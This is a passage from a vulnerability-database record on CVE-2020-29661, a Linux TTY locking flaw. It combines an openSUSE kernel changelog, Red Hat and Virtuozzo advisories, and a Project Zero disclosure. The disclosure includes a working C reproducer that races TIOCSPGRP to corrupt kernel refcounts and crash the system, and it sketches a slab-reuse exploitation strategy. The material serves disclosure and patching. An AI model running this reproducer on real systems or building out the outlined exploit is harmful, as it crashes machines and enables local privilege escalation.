the alignment of page data in the getdeviceinfo reply\n (for-next).\n - nvme-rdma: avoid request double completion for concurrent\n nvme_rdma_timeout (bsc#1181161).\n - nvme-tcp: avoid request double completion for concurrent\n nvme_tcp_timeout (bsc#1181161).\n - platform/x86: i2c-multi-instantiate: Do not create platform device for\n INT3515 ACPI nodes (git-fixes).\n - platform/x86: ideapad-laptop: Disable touchpad_switch for ELAN0634\n (git-fixes).\n - platform/x86: intel-vbtn: Drop HP Stream x360 Convertible PC 11 from\n allow-list (git-fixes).\n - platform/x86: intel-vbtn: Fix SW_TABLET_MODE always reporting 1 on some\n HP x360 models (git-fixes).\n - PM: hibernate: flush swap writer after marking (git-fixes).\n - pNFS: Mark layout for return if return-on-close was not sent (git-fixes).\n - powerpc: Fix build error in paravirt.h (bsc#1181148 ltc#190702).\n - powerpc/paravirt: Use is_kvm_guest() in vcpu_is_preempted() (bsc#1181148\n ltc#190702).\n - powerpc: Refactor is_kvm_guest() declaration to new header (bsc#1181148\n ltc#190702).\n - powerpc: Reintroduce is_kvm_guest() as a fast-path check (bsc#1181148\n ltc#190702).\n - powerpc: Rename is_kvm_guest() to check_kvm_guest() (bsc#1181148\n ltc#190702).\n - power: vexpress: add suppress_bind_attrs to true (git-fixes).\n - prom_init: enable verbose prints (bsc#1178142 bsc#1180759).\n - ptrace: reintroduce usage of subjective credentials in ptrace_has_cap()\n (bsc#1163930).\n - ptrace: Set PF_SUPERPRIV when checking capability (bsc#1163930).\n - r8152: Add Lenovo Powered USB-C Travel Hub (git-fixes).\n - Revert \"nfsd4: support change_attr_type attribute\" (for-next).\n - Revive usb-audio Keep Interface mixer (bsc#1181014).\n - rtmutex: Remove unused argument from rt_mutex_proxy_unlock()\n (bsc#1181349 bsc#1149032).\n - s390/cio: fix use-after-free in ccw_device_destroy_console (git-fixes).\n - s390/dasd: fix hanging device offline processing (bsc#1181169\n LTC#190914).\n - s390/dasd: fix list corruption of lcu list (git-fixes).\n - s390/dasd: fix list corruption of pavgroup group list (git-fixes).\n - s390/dasd: prevent inconsistent LCU device data (git-fixes).\n - s390/kexec_file: fix diag308 subcode when loading crash kernel\n (git-fixes).\n - s390/qeth: consolidate online/offline code (git-fixes).\n - s390/qeth: do not raise NETDEV_REBOOT event from L3 offline path\n (git-fixes).\n - s390/qeth: fix deadlock during recovery (git-fixes).\n - s390/qeth: fix L2 header access in qeth_l3_osa_features_check()\n (git-fixes).\n - s390/qeth: fix locking for discipline setup / removal (git-fixes).\n - s390/smp: perform initial CPU reset also for SMT siblings (git-fixes).\n - scsi: ibmvfc: Set default timeout to avoid crash during migration\n (bsc#1181425 ltc#188252).\n - scsi: lpfc: Enhancements to LOG_TRACE_EVENT for better readability\n (bsc#1180891).\n - scsi: lpfc: Fix auto sli_mode and its effect on CONFIG_PORT for SLI3\n (bsc#1180891).\n - scsi: lpfc: Fix crash when a fabric node is released prematurely\n (bsc#1180891).\n - scsi: lpfc: Fix crash when nvmet transport calls host_release\n (bsc#1180891).\n - scsi: lpfc: Fix error log messages being logged following SCSI task mgnt\n (bsc#1180891).\n - scsi: lpfc: Fix FW reset action if I/Os are outstanding (bsc#1180891).\n - scsi: lpfc: Fix NVMe recovery after mailbox timeout (bsc#1180891).\n - scsi: lpfc: Fix PLOGI S_ID of 0 on pt2pt config (bsc#1180891).\n - scsi: lpfc: Fix target reset failing (bsc#1180891).\n - scsi: lpfc: Fix vport create logging (bsc#1180891).\n - scsi: lpfc: Implement health checking when aborting I/O (bsc#1180891).\n - scsi: lpfc: Prevent duplicate requests to unregister with cpuhp\n framework (bsc#1180891).\n - scsi: lpfc: Refresh ndlp when a new PRLI is received in the PRLI issue\n state (bsc#1180891).\n - scsi: lpfc: Simplify bool comparison (bsc#1180891).\n - scsi: lpfc: Update lpfc version to 12.8.0.7 (bsc#1180891).\n - scsi: lpfc: Use the nvme-fc transport supplied timeout for LS requests\n (bsc#1180891).\n - scsi: qla2xxx: Fix description for parameter ql2xenforce_iocb_limit\n (bsc#1179142).\n - scsi: scsi_transport_srp: Do not block target in failfast state\n (bsc#1172355).\n - selftests/ftrace: Select an existing function in kprobe_eventname test\n (bsc#1179396 ltc#185738).\n - selftests: net: fib_tests: remove duplicate log test (git-fixes).\n - selftests/powerpc: Add a test of bad (out-of-range) accesses\n (bsc#1181158 ltc#190851).\n - selftests/powerpc: Add a test of spectre_v2 mitigations (bsc#1181158\n ltc#190851).\n - selftests/powerpc: Ignore generated files (bsc#1181158 ltc#190851).\n - selftests/powerpc: Move Hash MMU check to utilities (bsc#1181158\n ltc#190851).\n - selftests/powerpc: Move set_dscr() into rfi_flush.c (bsc#1181158\n ltc#190851).\n - selftests/powerpc: Only test lwm/stmw on big endian (bsc#1180412\n ltc#190579).\n - selftests/powerpc: spectre_v2 test must be built 64-bit (bsc#1181158\n ltc#190851).\n - serial: mvebu-uart: fix tx lost characters at power off (git-fixes).\n - spi: cadence: cache reference clock rate during probe (git-fixes).\n - SUNRPC: Clean up the handling of page padding in\n rpc_prepare_reply_pages() (for-next).\n - sunrpc: fix xs_read_xdr_buf for partial pages receive (for-next).\n - SUNRPC: rpc_wake_up() should wake up tasks in the correct order\n (for-next).\n - timers: Preserve higher bits of expiration on index calculation\n (bsc#1181318).\n - timers: Use only bucket expiry for base->next_expiry value (bsc#1181318).\n - udp: Prevent reuseport_select_sock from reading uninitialized socks\n (git-fixes).\n - USB: cdc-acm: blacklist another IR Droid device (git-fixes).\n - USB: cdc-wdm: Fix use after free in service_outstanding_interrupt()\n (git-fixes).\n - usb: dwc3: Add support for DWC_usb32 IP (git-fixes).\n - usb: dwc3: core: Properly default unspecified speed (git-fixes).\n - usb: dwc3: Update soft-reset wait polling rate (git-fixes).\n - USB: ehci: fix an interrupt calltrace error (git-fixes).\n - usb: gadget: aspeed: fix stop dma register setting (git-fixes).\n - usb: gadget: configfs: Fix use-after-free issue with udc_name\n (git-fixes).\n - usb: gadget: enable super speed plus (git-fixes).\n - usb: gadget: Fix spinlock lockup on usb_function_deactivate (git-fixes).\n - usb: gadget: function: printer: Fix a memory leak for interface\n descriptor (git-fixes).\n - USB: serial: option: add LongSung M5710 module support (git-fixes).\n - USB: serial: option: add Quectel EM160R-GL (git-fixes).\n - usb: typec: Fix copy paste error for NVIDIA alt-mode description\n (git-fixes).\n - usb: uas: Add PNY USB Portable SSD to unusual_uas (git-fixes).\n - usb: udc: core: Use lock when write to soft_connect (git-fixes).\n - USB: usblp: fix DMA to stack (git-fixes).\n - vfio iommu: Add dma available capability (bsc#1179572 LTC#190110).\n - vfio/pci: Implement ioeventfd thread handler for contended memory lock\n (bsc#1181219).\n - vfio-pci: Use io_remap_pfn_range() for PCI IO memory (bsc#1181220).\n - video: fbdev: atmel_lcdfb: fix return error code in\n atmel_lcdfb_of_init() (git-fixes).\n - video: fbdev: fix OOB read in vga_8planes_imageblit() (git-fixes).\n - video: fbdev: pvr2fb: initialize variables (git-fixes).\n - video: fbdev: vga16fb: fix setting of pixclock because a pass-by-value\n error (git-fixes).\n - x86/apic: Fix x2apic enablement without interrupt remapping\n (bsc#1152489).\n - x86/cpu/amd: Call init_amd_zn() om Family 19h processors too\n (bsc#1181077).\n - x86/cpu/amd: Set __max_die_per_package on AMD (bsc#1152489).\n - x86/hyperv: Fix kexec panic/hang issues (bsc#1176831).\n - x86/kprobes: Restore BTF if the single-stepping is cancelled\n (bsc#1152489).\n - x86/topology: Make __max_die_per_package available unconditionally\n (bsc#1152489).\n - x86/xen: avoid warning in Xen pv guest with CONFIG_AMD_MEM_ENCRYPT\n enabled (bsc#1181335).\n - xen-blkfront: allow discard-* nodes to be optional (bsc#1181346).\n - xen/privcmd: allow fetching resource sizes (bsc#1065600).\n - xfs: show the proper user quota options (bsc#1181538).\n - xhci: make sure TRB is fully written before giving it to the controller\n (git-fixes).\n - xhci: tegra: Delay for disabling LFPS detector (git-fixes).\n\n\nSpecial Instructions and Notes:\n\n Please reboot the system after installing this update.\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-241=1", "modified": "2021-02-05T21:59:38", "published": "2021-02-05T21:59:38", "id": "OPENSUSE-SU-2021:0241-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/GZRN6BW22C4S3GVCJVPHDT4HHTLVGVZE/", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-04-05T20:28:40", "bulletinFamily": "unix", "cvelist": ["CVE-2020-29661"], "description": "This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.\n\nSecurity Fix(es):\n\n* kernel: locking issue in drivers/tty/tty_jobctrl.c can lead to an use-after-free (CVE-2020-29661)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-30T12:47:49", "published": "2021-03-30T11:25:15", "id": "RHSA-2021:1031", "href": "https://access.redhat.com/errata/RHSA-2021:1031", "type": "redhat", "title": "(RHSA-2021:1031) Important: kpatch-patch security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-18T16:29:27", "bulletinFamily": "unix", "cvelist": ["CVE-2020-29661"], "description": "This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.\n\nSecurity Fix(es):\n\n* kernel: locking issue in drivers/tty/tty_jobctrl.c can lead to an use-after-free (CVE-2020-29661)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-18T20:15:42", "published": "2021-03-18T20:02:17", "id": "RHSA-2021:0940", "href": "https://access.redhat.com/errata/RHSA-2021:0940", "type": "redhat", "title": "(RHSA-2021:0940) Important: kpatch-patch security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2021-02-05T17:17:38", "bulletinFamily": "unix", "cvelist": ["CVE-2020-29661"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to the kernel 3.10.0-1127.18.2.vz7.163.46 (Virtuozzo Hybrid Server 7.5).\n**Vulnerability id:** CVE-2020-29661\nIncorrect locking in TTY subsystem could lead to use-after-free conditions and cause memory corruption.\n\n**Vulnerability id:** PSBM-122990\n'Bad unlock balance' error in ipmr_mfc_seq_stop(). It was discovered that the implementation of IPv6 multicast routing could try to access wrong data when a user tried to read certain files in /proc. An attacker could exploit that from a container to trigger 'bad unlock balance' error in ipmr_mfc_seq_stop(), followed by a kernel crash.\n\n**Vulnerability id:** PSBM-122991\nSoft lockup in ext4_ext_find_extent(). It was discovered that certain ioctl operations in ext4 did not check their arguments properly. An attacker could exploit that from a container to trigger soft lockups in ext4_ext_find_extent() function, which could result in a denial of service.\n\n", "edition": 1, "modified": "2021-02-05T00:00:00", "published": "2021-02-05T00:00:00", "id": "VZA-2021-006", "href": "https://help.virtuozzo.com/s/article/VZA-2021-006", "title": "[Important] [Security] Virtuozzo ReadyKernel patch 122.0 for Virtuozzo Hybrid Server 7.5", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-16T01:18:08", "bulletinFamily": "unix", "cvelist": ["CVE-2020-29661"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security fixes. The patch applies to the kernels 3.10.0-957.12.2.vz7.96.21 (Virtuozzo Hybrid Server 7.0.11 and Virtuozzo Infrastructure Platform 3.0), 3.10.0-1062.4.2.vz7.116.7 (Virtuozzo Hybrid Server 7.0.12 HF1 and Virtuozzo Hybrid Infrastructure 3.5), 3.10.0-1062.12.1.vz7.131.10 (Virtuozzo Hybrid Server 7.0.13), 3.10.0-1127.8.2.vz7.151.14 (Virtuozzo Hybrid Server 7.0.14), 3.10.0-1127.8.2.vz7.158.8 (Virtuozzo Hybrid Infrastructure 4.0).\n**Vulnerability id:** CVE-2020-29661\n[3.10.0-957.12.2.vz7.96.21 to 3.10.0-1127.8.2.vz7.158.8] Incorrect locking in TTY subsystem could lead to use-after-free conditions and cause memory corruption.\n\n**Vulnerability id:** PSBM-122990\n[3.10.0-957.12.2.vz7.96.21 to 3.10.0-1127.8.2.vz7.158.8] 'Bad unlock balance' error in ipmr_mfc_seq_stop(). It was discovered that the implementation of IPv6 multicast routing could try to access wrong data when a user tried to read certain files in /proc. An attacker could exploit that from a container to trigger 'bad unlock balance' error in ipmr_mfc_seq_stop(), followed by a kernel crash.\n\n**Vulnerability id:** PSBM-122991\n[3.10.0-957.12.2.vz7.96.21 to 3.10.0-1127.8.2.vz7.158.8] Soft lockup in ext4_ext_find_extent(). It was discovered that certain ioctl operations in ext4 did not check their arguments properly. An attacker could exploit that from a container to trigger soft lockups in ext4_ext_find_extent() function, which could result in a denial of service.\n\n", "edition": 1, "modified": "2021-02-15T00:00:00", "published": "2021-02-15T00:00:00", "id": "VZA-2021-008", "href": "https://help.virtuozzo.com/s/article/VZA-2021-008", "title": "[Important] [Security] Virtuozzo ReadyKernel patch 122.0 for Virtuozzo Hybrid Server 7.0, Virtuozzo Infrastructure Platform 3.0, and Virtuozzo Hybrid Infrastructure 3.5, 4.0", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-12-22T17:31:59", "description": "", "published": "2020-12-22T00:00:00", "type": "packetstorm", "title": "Linux TIOCSPGRP Broken Locking", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-29661"], "modified": "2020-12-22T00:00:00", "id": "PACKETSTORM:160681", "href": "https://packetstormsecurity.com/files/160681/Linux-TIOCSPGRP-Broken-Locking.html", "sourceData": "`Linux: Broken locking in TIOCSPGRP leads to corrupted tty->pgrp refcount \n \ntiocspgrp(), the handler for the TIOCSPGRP ioctl, has the following signature: \n \nstatic int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p) \n \nIt receives two `tty_struct` pointers because, for PTY pairs, userspace can use \nthe same ioctl() on both sides of the pair, with slightly different semantics. \n`tty` points to the side that userspace passed to `ioctl()` as file descriptor \n(either the TTY or the master), while `real_tty` always points to the TTY. \n \n \ntiocspgrp() contains the following code: \n \nstatic int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p) \n{ \n[...] \nspin_lock_irq(&tty->ctrl_lock); \nput_pid(real_tty->pgrp); \nreal_tty->pgrp = get_pid(pgrp); \nspin_unlock_irq(&tty->ctrl_lock); \n[...] \n} \n \nIt always modifies the ->pgrp of the TTY but, depending on the file descriptor \npassed in by the caller, sometimes takes the ->ctrl_lock of the master instead. \n \n \nThis means that it is possible to race TIOCSPGRP on the master with TIOCSPGRP on \nthe TTY. \n \n \nThe following reproducer quickly causes errors (e.g. starting with a \n\\\"refcount_t: addition on 0; use-after-free.\\\" message): \n \n====================================================================== \n#define _GNU_SOURCE \n#include <err.h> \n#include <unistd.h> \n#include <fcntl.h> \n#include <termios.h> \n#include <signal.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <sys/prctl.h> \n#include <sys/ioctl.h> \n#include <sys/wait.h> \n \nint main(void) { \nsync(); /* we're probably gonna crash... */ \n \n/* \n* We may already be process group leader but want to be session leader; \n* therefore, do everything in a child process. \n*/ \npid_t main_task = fork(); \nif (main_task == -1) err(1, \\\"initial fork\\\"); \nif (main_task != 0) { \nint status; \nif (waitpid(main_task, &status, 0) != main_task) \nerr(1, \\\"waitpid main_task\\\"); \nreturn 0; \n} \nif (prctl(PR_SET_PDEATHSIG, SIGKILL)) \nerr(1, \\\"PR_SET_PDEATHSIG\\\"); \nif (getppid() == 1) exit(0); \n \n/* basic preparation */ \nif (signal(SIGTTOU, SIG_IGN)) \nerr(1, \\\"signal\\\"); \nif (setsid() == -1) \nerr(1, \\\"start new session\\\"); \n \n/* set up a new pty pair */ \nint ptmx = open(\\\"/dev/ptmx\\\", O_RDWR); \nif (ptmx == -1) \nerr(1, \\\"open ptmx\\\"); \nunlockpt(ptmx); \nint tty = open(ptsname(ptmx), O_RDWR); \nif (tty == -1) \nerr(1, \\\"open tty\\\"); \n \n/* \n* Let a series of children change the ->pgrp pointer \n* protected by the tty's ctrl_lock... \n*/ \npid_t child = fork(); \nif (child == -1) \nerr(1, \\\"fork\\\"); \nif (child == 0) { \nif (prctl(PR_SET_PDEATHSIG, SIGKILL)) \nerr(1, \\\"PR_SET_PDEATHSIG\\\"); \nif (getppid() == 1) exit(0); \n \nwhile (1) { \npid_t grandchild = fork(); \nif (grandchild == -1) \nerr(1, \\\"fork grandchild\\\"); \nif (grandchild == 0) { \nif (setpgid(0, 0)) \nerr(1, \\\"setpgid\\\"); \nint pgrp = getpid(); \nif (ioctl(tty, TIOCSPGRP, &pgrp)) \nerr(1, \\\"TIOCSPGRP (tty)\\\"); \nexit(0); \n} \nint status; \nif (waitpid(grandchild, &status, 0) != grandchild) \nerr(1, \\\"waitpid for grandchild\\\"); \n} \n} \n \n/* \n* ... while the parent changes the same ->pgrp pointer under the \n* ctrl_lock of the other side of the pty pair. \n*/ \nwhile (1) { \nint pgrp = getpid(); \nif (ioctl(ptmx, TIOCSPGRP, &pgrp)) \nerr(1, \\\"TIOCSPGRP (ptmx)\\\"); \n} \n} \n====================================================================== \n \nThis seems to me like it would be fairly promising as a target for exploitation; \nfor example, a strategy along the following lines might work: \n \n- enter a deeply nested PID namespace, such that you have a SLUB cache like \npid_10 to yourself \n- take a bunch of references to two `struct pid` instances (e.g. through pidfds \nor procfs?) \n- try to hit the bug in a loop such that the refcounts are hopefully off by a \nbit, but both `struct pid` instances still exist \n- on both `struct pid`, drop references one by one until one is freed \n- to detect reallocation, try to get SLUB to reuse the object for another PID, \nthen check something like pidfd_show_fdinfo() or tiocgsid() on the old pid \n(which mostly dump plain data from a `struct pid` without touching other \nstuff in there) \n- get the entire SLUB high-order page freed, and try to reallocate it into \nanother slab \n- exploit the resulting type confusion, e.g. by changing the refcount of the \nfreed struct pid \n \nI haven't tried that yet though. \n \n \nI'm going to send suggested patches for this issue and for less severe TTY \nlocking problems around the ->session pointer in a minute. \n(The ->session stuff is sufficiently theoretical that it probably doesn't really \nneed the full security treatment, but I figured it'd be less messy if I include \nboth here...) \nI have done some basic testing of these changes; the only thing that shows up as \na problem is a lockdep warning about a possible deadlock when triggering the SAK \nlogic via sysrq (involving console_lock, termios_rwsem and tty_bufhead::lock), \nbut that also happens on master and doesn't seem related to my changes. \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse, \nthe bug report will become visible to the public. The scheduled disclosure \ndate is 2021-03-03. Disclosure at an earlier date is possible if \nthe bug has been fixed in Linux stable releases (per agreement with \nsecurity@kernel.org folks). \n \nRelated CVE Numbers: CVE-2020-29661. \n \n \n \nFound by: jannh@google.com \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160681/GS20201222172728.txt"}]}
